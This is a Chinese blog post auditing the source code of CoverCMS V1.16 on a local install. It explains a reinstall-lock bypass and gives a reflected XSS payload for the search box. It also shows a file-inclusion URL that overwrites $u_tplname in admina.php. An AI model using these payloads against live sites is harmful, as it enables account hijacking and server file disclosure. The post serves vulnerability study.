小菜只能找找没人用的cms练练手了

cnvd上有个 CoverCMS V1.16存在多个漏洞

漏洞描述 :CoverCMS V1.16存在重装、信息泄露、暴力破解、存储型跨站脚本和反射型跨站脚本漏洞。攻击者可利用漏洞获取敏感信息,如数据库账号密码、数据库名泄露、后台默认弱口令;在用户投稿文章页面中插入恶意js代码,可获得用户cookie等信息,导致用户被劫持;在前台搜索框处构造XSS语句,可进行弹框操作,获得用户cookie等信息。

简单安装完后看看代码吧。

重装漏洞

安装完后会在/dynamic/下生产install.lock

install.php

$lockfile = './dynamic/install.lock';

$step = $_POST['step'] ? $_POST['step'] : ($_GET['step'] ? $_GET['step'] : 1);

.../省略

if(!isset($dbhost) || !isset($ckpre)){

	$ierror = lang('base.inc.php noexist , please upload .');

}elseif(!ini_get('short_open_tag')){

	$ierror = lang('shorttaginvalid');

}elseif(file_exists($lockfile)){

	$ierror = lang('lockexist');

}elseif(!class_exists('cls_mysql')){

	$ierror = lang('include/mysql.cls.php noexist , please upload .');

}

安装时会进行判断是否存在install.lock

如果存在会进行提示,但是没有exit()

我们再次访问http://localhost/covercms/install.php

发现开始安装的按钮无法点击。

if($step == 1){

	ins_header(1);

	echo "<div class=\"licence\">".lang('ins_introduce')."</div>";

	ins_mider();

	hidden_str('step',2);

	button_str('submit',lang('start install'),$ierror ? 1 : 0);

	ins_footer(1);

	$ierror && ins_message($ierror);

}elseif($step == '2'){

	ins_header(1);

	echo "<div class=\"licence\">".lang('ins_license')."</div>";

	ins_mider();

	hidden_str('step',3);

	button_str('submit',lang('agree'),$ierror ? 1 : 0);

	ins_footer(1);

	$ierror && ins_message($ierror);

.../省略

button_str函数会根据$ierror在html标签添加 disabled=""

F12删掉 或直接http://localhost/covercms/install.php?step=2

就可以跳步骤了

虽然能看到 数据库账号密码、数据库名泄露、后台默认弱口令

但还是重装不了啊...

前台搜索xss

search.php

if($searchword){

	$filterstr .= ($filterstr ? '&' : '').'searchword='.rawurlencode(stripslashes($searchword));

}

对搜索词根本没过滤

闭合前后标签即可

"> <script>alert(/xss/)</script> <"

在用户投稿文章页面中插入恶意js代码

没找到 先留着

任意文件包含漏洞 (多处)

搜索带include和$的 可能存在漏洞

带后缀的就不看了

answers.inc.php

if(!submitcheck('barcsedit')){ //满足barcsedit为空 不设置即可

			if(empty($u_tplname)){

                //$u_tplname 可以变量覆盖(general.inc.php中伪全局 在admina中引用)

				echo form_str($actionid.'arcsedit',"?entry=answers&action=answersedit&page=$page$param_suffix");

				//搜索区块

				tabheader_e();

....//省略

			}else include(M_ROOT.$u_tplname);

....//省略

.inc.php的文件会在admina.php中引用

include_once M_ROOT.'./admina/'.$entry.'.inc.php';

构造url http://localhost/covercms/admina.php?entry=answers&action=answersedit&u_tplname=robots.txt

其他include $u_tplname的与之类似

代码审计:covercms 1.6的更多相关文章

  1. [代码审计]covercms 后台getshell

    0x00 环境介绍 CMS名称: covercms 运行环境: php 5.6.27-nts + apache + mysql 系统版本: 1.16 漏洞等级:高危 漏洞简介: 后台awnotas.i ...

  2. PHP代码审计中你不知道的牛叉技术点

    一.前言 php代码审计如字面意思,对php源代码进行审查,理解代码的逻辑,发现其中的安全漏洞.如审计代码中是否存在sql注入,则检查代码中sql语句到数据库的传输 和调用过程. 入门php代码审计实 ...

  3. 技术专题-PHP代码审计

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/24472674来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 一.前言 php代码审计如字面 ...

  4. 关于PHP代码审计和漏洞挖掘的一点思考

    这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出. PHP的漏洞有很大一部分是来自于程序员本身的经验不足,当然和服务器的配置有关,但那属于系统安全范畴了,我不太懂 ...

  5. Kindeditor 代码审计

    <?php /** * KindEditor PHP * * 本PHP程序是演示程序,建议不要直接在实际项目中使用. * 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置. * */ r ...

  6. 一个CMS案例实战讲解PHP代码审计入门

    前言 php代码审计介绍:顾名思义就是检查php源代码中的缺点和错误信息,分析并找到这些问题引发的安全漏洞. 1.环境搭建: 工欲善其事必先利其器,先介绍代码审计必要的环境搭建 审计环境 window ...

  7. php代码审计基础笔记

    出处: 九零SEC连接:http://forum.90sec.org/forum.php?mod=viewthread&tid=8059 --------------------------- ...

  8. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.同上一篇,我 ...

  9. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 2.全局防护Bypass之UrlDecode

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.遇到这种情况 ...

随机推荐

  1. MySQL 5.6&5.7 性能优化 TOP10(转)

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明.本文链接:https://blog.csdn.net/NLOneDay/article/deta ...

  2. Visual Studio 2019更新到16.2.2

    Visual Studio 2019更新到16.2.2 此次更新的变化有以下几点: (1)修复了Visual Studio在关闭时的停止响应问题.(2)修复CVE-2019-1211权限提升漏洞.(3 ...

  3. ubuntu上保存防火墙规则

    与CentOS不同,ubuntu的iptables规则不是写在系统文件/etc/sysconfig/iptables 中的(至少1204 1404不是这样的) 保存: ubuntu的iptables建 ...

  4. C/C++ socket编程教程之九:TCP的粘包问题以及数据的无边界性

    C/C++ socket编程教程之九:TCP的粘包问题以及数据的无边界性 上节我们讲到了socket缓冲区和数据的传递过程,可以看到数据的接收和发送是无关的,read()/recv() 函数不管数据发 ...

  5. java-mybaits-014-数据库缓存设计【querycache、mybatis一级缓存、二级缓存】

    一.概述 一般来说,可以在5个方面进行缓存的设计: 1.最底层可以配置的是数据库自带的query cache, 2.mybatis的一级缓存,默认情况下都处于开启状态,只能使用自带的Perpetual ...

  6. 为什么在MySQL数据库中无法创建外键?(MyISAM和InnoDB详解)

    问题描述:为什么在MySQL数据库中不能创建外键,尝试了很多次,既没有报错,也没有显示创建成功,真实奇了怪,这是为什么呢? 问题解决:通过查找资料,每次在MySQL数据库中创建表时默认的情况是这样的: ...

  7. Django models中的meta选项

    通过一个内嵌类 "class Meta" 给你的 model 定义元数据, 类似下面这样: class Foo(models.Model): bar = models.CharFi ...

  8. Python3 IO编程之StringIO和BytesIO

    StringIO 很多时候,数据读写不一定是文件,也可以在内存中读写. 要把str写入StringIO,我们需要先创建一个StringIO,然后像文件一样写入即可 >>> from ...

  9. Docker:学习笔记(1)——基础概念

    Docker:学习笔记(1)——基础概念 Docker是什么 软件开发后,我们需要在测试电脑.客户电脑.服务器安装运行,用户计算机的环境各不相同,所以需要进行各自的环境配置,耗时耗力.为了解决这个问题 ...

  10. DevOps - DevOps精要 - 溯源

    1 - DevOps的含义 DevOps涉及领域广泛,其含义因人而异,在不同的理解和需求场景下,有着不同的实践形式. DevOps可以理解为是一个职位.一套工具集合.一组过程与方法.一种组织形式与文化 ...